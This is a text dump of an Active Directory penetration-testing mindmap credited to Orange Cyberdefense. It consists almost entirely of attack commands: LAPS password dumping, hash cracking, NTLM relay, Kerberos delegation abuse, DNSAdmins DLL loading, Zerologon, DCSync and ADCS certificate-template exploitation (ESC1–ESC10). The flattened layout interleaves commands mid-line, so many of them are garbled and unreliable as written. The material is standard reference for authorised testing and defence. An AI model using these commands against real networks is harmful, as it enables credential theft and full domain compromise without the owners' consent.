  - who can read LAPS: MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p
  - Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
  - foreach ($objResult in $colResults) {$objComputer = $objResult.Properties; $objComputer.name | where {$objcomputer.name -ne $env:computername} | %{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
  - cme ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps
  - use post/windows/gather/credentials/enum_laps
  -> local admin cleartext pass

Kerberos Delegation -> move
  - list delegations: ldeep ldap -u <user> -p '<password>' -d <domain> -s ldap://<dc_ip> delegations ; findDelegation.py <domain>/<user>:<password>@<ip>

Crack Hash
  - LM: john --format=lm hash.txt ; hashcat -m 3000 -a 3 hash.txt
  - NTLM: john --format=nt hash.txt ; hashcat -m 1000 -a 3 hash.txt
  - NetNTLMv1: john --format=netntlm hash.txt ; hashcat -m 5500 -a 3 hash.txt ; https://crack.sh/
  - NetNTLMv2: john --format=netntlmv2 hash.txt ; hashcat -m 5600 -a 0 hash.txt rockyou.txt
  - Kerberos 5 TGS: hashcat -m 13100 -a 0 spn.txt rockyou.txt ; john spn.txt --format=krb5tgs --wordlist=rockyou.txt
  - Kerberos 5 TGS AES128: hashcat -m 19600 -a 0 spn.txt rockyou.txt
  - Kerberos 5 TGS AES256: hashcat -m 19700 -a 0 spn.txt rockyou.txt
  - Kerberos ASREP: hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt
  - MsCache 2 (slow): hashcat -m 2100 -a 0 mscache-hash rockyou.txt
  -> cleartext pass -> user account / Lateral move

Kindly provided by Orange Cyberdefense ;-)
Some commands can break stuff, be sure to know what you are doing!
Please find the legend below.

Credits: mayfly (@M4yFly), viking (@Vikingfr), Sant0rryu (@Sant0rryu), Jenaye (@jenaye_fr), Daahtk (@Daahtk)
Inspired by / sources: https://www.thehacker.recipes/ (@_nwodtuhs) ; https://www.ired.team/ (@spotheplanet) ; https://ppn.snovvcrash.rocks/ (@snovvcrash) ; https://book.hacktricks.xyz/ (@carlospolopm) ; https://github.com/swisskyrepo/PayloadsAllTheThings/ (@pentest_swissky) ; https://blog.harmj0y.net/ (@harmj0y) ; https://hausec.com/domain-penetration-testing/ (@haus3c) ; https://dirkjanm.io/ (@_dirkjan) ; https://casvancooten.com/ (@chvancooten) ; https://zer1t0.gitlab.io/posts/attacking_ad/ ; https://beta.hackndo.com (@HackAndDo) ; and a lot more...

Legend (node colours in the original map): BloodHound ; PowerView ; Impacket ; crackmapexec ; certipy ; Metasploit ; Windows tool ; Command
MATCH (gr:Group), (gp:GPO), p=((gr)- <password>@<ip>
dangerous (could break stuff) [:GenericWrite]->(gp)) RETURN p

🔥 very common and efficient technic (quick


win)
Get-DomainObjectAcl -SearchBase
Get-NetComputer -Unconstrained

"CN=Policies,CN=System,DC=blah,DC=com" -
ResolveGUIDs | ? {​​$_.ObjectAceType -eq Get-DomainComputer -Unconstrained -
"Group-Policy-Container" }​​| select ObjectDN, Properties DnsHostName
CVE (probably patched) SID of principals that can create new GPOs in
the domain ActiveDirectoryRights, SecurityIdentifier | fl
MATCH (c:Computer
how to read GPO Get unconstrained delegation machines {unconstraineddelegation:true}) RETURN c
Get-DomainOU | Get-DomainObjectAcl -
ResolveGUIDs | ? {​​$_.ObjectAceType -eq "GP-
Enumeration infos MATCH (u:User {owned:true}), (c:Computer
Link" -and $_.ActiveDirectoryRights -match
{unconstraineddelegation:true}),
return the principals that can write to the GP- "WriteProperty" }​​| select ObjectDN,
technique/status/explanation linux command p=shortestPath((u)-[*1..]->(c)) RETURN p
Link attribute on OUs SecurityIdentifier | fl
Highlight Technique 1 result / go to
windows command Unconstrained delegation privilege::debug sekurlsa::tickets /export
Generic Write on GPO Abuse GPO Access sekurlsa::tickets /export

windows command Result / go to 1 Kerberos TGT


Get tickets Rubeus dump /service:krbtgt /nowrap
DNSadmins abuse dnscmd.exe /config /serverlevelplugindll sc \\DNSServer stop dns
Technique 2 (CVE) technique/status/explanation or Admin
Entry point (CVE-2021-40469) <\\path\to\dll> # need a dnsadmin user sc \\DNSServer start dns UAC: ADS_UF_TRUSTED_FOR_DEL
linux command Result / go to 2 EGATION Rubeus dump /luid:0xdeadbeef /nowrap

if dc
windows command Rubeus monitor /interval:5
Kerberos TGT Pass The Ticket DCSync DomAdmin
technique/status/explanation go to (Force_connection_with_coerced_auth)
Technique3 assemble linux command
technique/status/explanation MITM (Listen and relay) Get-DomainComputer -TrustedToAuth -
Properties DnsHostName, MSDS-
Listener AllowedToDelegateTo

NetNtlmv1
🔥
Get-DomainUser -TrustedToAuth
responder -I eth0 (use --lm to force lm
downgrade) NetNtlmv2 MATCH (c:Computer), (t:Computer), p=((c)-
Get constrained delegation [:AllowedToDelegate]->(t)) RETURN p
Listen smbclient.py User
MATCH (u:User {owned:true}), (c:Computer
{name: "<MYTARGET.FQDN>"}),
Kerberos Delegation p=shortestPath((u)-[*1..]->(c)) RETURN p
NTLM Relay

use exploit/windows/smb/smb_relay Rubeus hash /password:<password>


With protocol transition (any)
#windows200 / windows server2008 Admin
relay on itself MS08-068 Object: msDS-AllowedToDelegateTo
UAC: TRUST_TO_AUTH_FOR_DELEGA HOST psexec \\\<target> <cmd>
TION
NetNTLMv1 remove mic
Rubeus s4u /ticket:<ticket> /impersonateuser: Enter-Pssession -computername <target>
Rubeus asktgt /user:<user> /domain:<domain> <admin_user> /msdsspn:<spn_constrained>
ntlmrelayx.py --remove-mic --escalate-user /aes256:<AES 256 hash> /altservice:CIFS /ptt Altservice HTTP
<user> -t ldap://<dc_fqdn> -smb2support DcSync Invoke-Command <target> -Scriptblock
Constrained delegation Kerberos TGS
{<cmd>}
SMB -> LDAP(S)
ntlmrelayx.py -t ldaps://<dc> --remove-mic --
add-computer <computer_name> CIFS dir \\<target>\c$
<computer_password> --delegate-access - RBCD
NetNTLMv2 remove mic (CVE-2019-1040) relay to LDAP smb2support
LDAP

ntlmrelayx -t ldap://<dc> --shadow-credentials


shadow credentials addcomputer.py -computer-name rbcd.py -delegate-from '<rbcd_com>$' - getST.py -spn host/<constrained> -hashes '' getST.py -spn <constrained_spn>/<target> -
--shadow-target '<dc>'
'<rbcd_com>$' -computer-pass delegate-to '<constrained>$' -dc-ip getST.py -self -impersonate "administrator" - '<domain>/<computer_account>' -impersonate hashes '<hash>' '<domain>/<constrained>$' -
'<rbcd_compass>' -dc-ip <dc> '<dc>' -action 'write' -hashes '<hash>' dc-ip <ip> Administrator --dc-ip <dc_ip> -additional-ticket impersonate Administrator --dc-ip <dc_ip> - Kerberos TGS
ntlmrelayx.py -wh <attacker_ip> -t Without protocol transition (kerberos only) '<domain>/<user>:<password>' <domain>/<constrained>$ <domain>/<rbcd_com>$':'<rbcd_compass>' <previous_ticket> additional-ticket <previous_ticket>
ldap://<target> -l /tmp -6 -debug Users
Object: msDS-AllowedToDelegateTo RBCD
UAC: TRUSTED_FOR_DELEGATION

HTTP(S) -> LDAP self RBCD

nmap -Pn -sS -T4 --open --script smb- rubeus.exe s4u /user:<fake_computer$>
security-mode -p445 ADDRESS/MASK /aes256:<AES 256 hash>
(MITM)
NTLM relay /impersonateuser:administrator
Listen and Relay
Find SMB not signed (default on non DC) use exploit/windows/smb/smb_relay /msdsspn:cifs/<victim.domain.local> Admin
rubeus.exe hash /password:<computer_pass> /user:<computer> /domain:<domain>
/altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
cme smb $hosts --gen-relay-list relay.txt

ntlmrelayx.py -tf targets.txt -smb2support rbcd.py -delegate-from '<computer>$' - getST.py -spn host/<dc_fqdn>
(-6) --enum-domain Users
SMB unsigned delegate-to '<target>$' -dc-ip '<domain>/<computer_account>:
-> SMB '<dc>' -action 'write' <computer_pass>' -impersonate Administrator - Kerberos TGT

🔥
Object: msDS-
AllowedToActOnBehalfOfOtherIdentit <domain>/<user>:<password> -dc-ip <dc_ip>
ntlmrelayx.py -tf targets.txt -smb2support Resource-Based Constrained Delegation
lateral move (socks)
-socks (-6) (RBCD)
addcomputer.py -computer-name
'<computer_name>' -computer-pass
http ADCS web ESC8 '<ComputerPassword>' -dc-host <dc> -domain-
netbios <domain_netbios> '<domain>/<user>:
-> HTTP sccm ntlm relay attack <password>'
add computer account

ntlmrelayx.py -t mssql://<ip> -smb2support –


socks lateral move (socks)
relay to mssql
-> MSSQL

ntlmrelayx.py -t dcsync://<dc_02_ip> -
smb2support -auth-smb <user>:<password> DcSync
Zero-Logon (safe method) coerce come from dc01, relay to dc02
SMB -> Netlogon (CVE-2020-1472)

Arp poisoning
Weak ADCS configuration

pywsus.py
wsus relay ntlmrelayx.py -t Rubeus.exe asktgt /user:<user> /certificate:
http://<dc_ip>/certsrv/certfnsh.asp -debug - <base64-certificate> /ptt
smb2support --adcs --template
DomainController
gettgtpkinit.py -pfx-base64 $(cat cert.b64)
<domain>/<dc_name>$ <ccache_file> Pass the ticket DCSync DomAdmin
Web enrollment is up
🔥 ESC8
certipy relay -ca <ca_ip> -template
DomainController certipy auth -pfx <certificate> -dc-ip <dc_ip>

certipy req -u <user>@<domain> -p


<password> -target <ca_server> -template
'<vulnerable template name>' -ca <ca_name> -
upn <target_user>@<domain>
Pass the certificate

ESC1 (Request a certificate from a vulnerable certify.exe request /ca:<server>\<ca-name>


template) /template:"<vulnerable template name>"
[/altname:"Admin"]

certutil -v -dsTemplate ESC2

Get templates information certify.exe find [ /vulnerable] certify.exe request request /ca:<server>\<ca-
Misconfigured Certificate Templates
name> /template:<template> /onbehalfof:
certipy find -u <user>@<domain> -p certify.exe request /ca:<server>\<ca-name> <domain>\<user> /enrollcert:<path.pfx>
<password> -dc-ip <domaincontroller> /template:"<vulnerable template name>" [/enrollcertpw:<cert-password>]

Pass the certificate


certipy req -u <user>@<domain> -p
ESC3 (Use an enrollment agent to request a <password> -target <ca_server> -template
certipy req -u <user>@<domain> -p
certificate) '<vulnerable template name>' -ca <ca_name> -
<password> -target <ca_server> -template
'<vulnerable template name>' -ca <ca_name> on-behalf-of '<domain>\<user>' -pfx <cert>

certipy template -u <user>@<domain> -p


'<password>' -template <vuln_template> -
certipy template -u <user>@<domain> -p restore template configuration <template>.json
'<password>' -template <vuln_template> -save- ESC1 on vulnerable template
write privilege over a certificate template old -debug
ESC4

ADCS weak configuration certipy ca -ca <ca_name> -add-officer '<user>'


certipy find -u <user>@<domain> -p -username <user>@<domain> -password certipy ca -u <user>@<domain> -p certipy req -u <user>@<domain> -p
<password> -dc-ip <domaincontroller> Misconfigured ACL <password>
getACL information Manage CA '<password>' -ca <ca_name> -issue-request '<password>' -ca <ca_name> -retreive Pass the certificate
<request_id> <request_id>
Issue request
certipy req -username <user>@<domain> -
ESC7 certipy ca -ca <ca_name> -enable-template password <password> -ca <ca_name> -
'<ecs1_vuln_template>'-username template '<vulnerable template name>' -upn
Manage certificate <user>@<domain> -password <password> '<target_user>' error, but save private key

certutil -TCAInfo
Display CA information
certify.exe cas

Abuse ATTRIBUTESUBJECTALTNAME2 flag set


on CA
certutil -config "CA_HOST\CA_NAME" -getreg you can choose any certificate template that ESC1
"policy\EditFlags" permits client authentication
Misconfigured CA ESC6
Get CA flags (if remote registry is enabled)
certipy / certify.exe (only the flag
ATTRIBUTESUBJECTALTNAME2)

Get PKI objects information certify.exe pkiobjects vulnerable PKI Object access control ESC5 ACL

certipy req -username <accountB>@<domain>


-hashes <hashB> -ca <ca_name> -template
<vulnerable template>
certipy account update -username ESC9
<accountA>@<domain> -password <passA> - certipy account update -username
user <accountB> -upn Administrator <accountA>@<domain> -password <passA> -
ESC9/ESC10 (Case 1) certipy req -username <accountB>@<domain> [Kerberos Mapping] ESC9/ESC10(Case 1)
user <accountB> -upn <accountB>@<domain>
certipy shadow auto -username -hashes <hashB> -ca <ca_name> -template
<any template with client auth> Reset accountB UPN Pass the certificate
<accountA>@<domain> -p <passA> -account
ESC10 (Case 1) [Schannel Mapping] ESC9/ESC10 (Case 2)
<accountB>
Misconfigured Certificate Mapping
ESC9/ESC10
(blind test)
certipy account update -username
<accountA>@<domain> -password <passA> -
user <accountB> -upn '<dc_name$>@<domain>'
ESC10 (Case 2)
